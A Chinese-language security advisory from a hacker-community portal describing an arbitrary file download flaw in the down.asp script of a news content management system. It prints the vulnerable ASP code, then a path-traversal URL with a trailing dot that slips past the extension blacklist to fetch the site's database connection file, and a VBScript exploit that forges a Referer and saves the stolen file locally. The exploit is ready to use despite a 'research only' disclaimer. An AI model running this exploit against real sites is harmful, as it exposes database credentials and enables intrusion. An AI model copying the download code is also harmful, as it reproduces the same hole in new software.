我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

沸腾展望新闻系统任意文件下载漏洞

2012年02月19日14:46 阅读: 18148 次

标签: 漏洞, 沸腾展望, 新闻系统, 文件下载

受影响版本:
沸腾展望新闻系统[核心:尘缘雅境] V1.1 Access版 Finish(SP3)

描述:
漏洞文件:
down.asp

Const adTypeBinary = 1 
FileName = Request.QueryString("FileName") 
if FileName = "" Then 
Response.Write "无效文件名!" 
Response.End 
End if 
FileExt = Mid(FileName, InStrRev(FileName, ".") + 1) 
Select Case UCase(FileExt) 
Case "ASP", "ASA", "ASPX", "ASAX", "MDB" 
Response.Write "非法操作!" 
Response.End 
End Select 
Response.Clear 
if lcase(right(FileName,3))="gif" or lcase(right(FileName,3))="jpg" or lcase(right(FileName,3))="png" then 
Response.ContentType = "image/*" '对图像文件不出现下载对话框 
else 
Response.ContentType = "application/ms-download" 
end if 
Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName")) 
Set Stream = server.CreateObject("ADODB.Stream") 
Stream.Type = adTypeBinary 
Stream.Open 

SavePath = FileUploadPath '存放上传文件的目录 
TrueFileName = SavePath & FileName 

Stream.LoadFromFile Server.MapPath(TrueFileName) 
While Not Stream.EOS 
Response.BinaryWrite Stream.Read(1024 * 64) 
Wend 




测试方法: 

[警 告] 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! 

http://www.target.com/down.asp?FileName=../conn.asp. 

(不需要登录,用minibrowser伪造referer) 
VBS版利用 

Dim strUrl, strData 
strUrl = "http://www.target.com/down.asp?FileName=../conn.asp." 
Set xPost = CreateObject("Microsoft.XMLHTTP") 
With xPost 
.open "Get", strUrl, False 
.SetRequestHeader "Referer", strUrl 
.Send() 
strData = .responseBody 

End with 
Set sGet = CreateObject("ADODB.Stream") 
With sGet 
.Mode = 3 
.Type = 1 
.Open() 
.Write(strData) 
.SaveToFile "Conn.asp",2 
End with 

set sGet = Nothing 
set xPost = Nothin 
分享到: 更多
蓝客门户
©2001-2017 中国蓝客联盟 版权所有.
关于蓝客联盟历史宗旨章程技术服务联系我们蓝客社区